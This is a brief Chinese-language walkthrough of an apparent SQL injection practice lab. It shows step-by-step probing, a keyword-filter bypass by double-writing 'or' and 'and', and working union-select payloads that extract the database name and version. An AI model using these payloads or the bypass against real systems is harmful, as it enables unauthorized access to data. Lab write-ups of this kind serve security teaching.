知识点：

• or and # 被过滤了
• 有回显可以用联合注入
• 这里可以利用双写绕过（亲测有效，）
  • oorr
  • anandd
  • 这样的话可以使用错误注入（不演示了，有兴趣可以试一下）

又是一个id输入

测试是什么类型的注入

构造payload:id=1

构造payload:id=1/0

构造payload:id=1'

构造payload:id=1''

发现界面是有输出的，同时界面提示了or and等关键字应该是要过滤的，并且下面给出了过滤后的信息;经过不断的测试发现，这是一个字符型注入

构造payload:id=1'+or+1=1#

发现报错了，果然or and 关键字被过滤了

使用联合注入试一下

构造payload:id=0'+union+select+1,2,3#

发现界面错误，看下面的提示发现#被过滤了；其实上面测试的时候就发现了，这里就是按照一般思路测试一下，在不知道什么过滤的条件下需要一步步测试；根据提示发现一直提示单引号问题就能猜出#注释没有发挥作用

构造payload:id=0'+union+select+1,2,3+--+

成功显示了内容

接下来获取数据库名和版本信息

构造payload:id=0'+union+select+1,version(),database()+--+

成功获取了数据库名和版本信息，这里就结束了，收工

10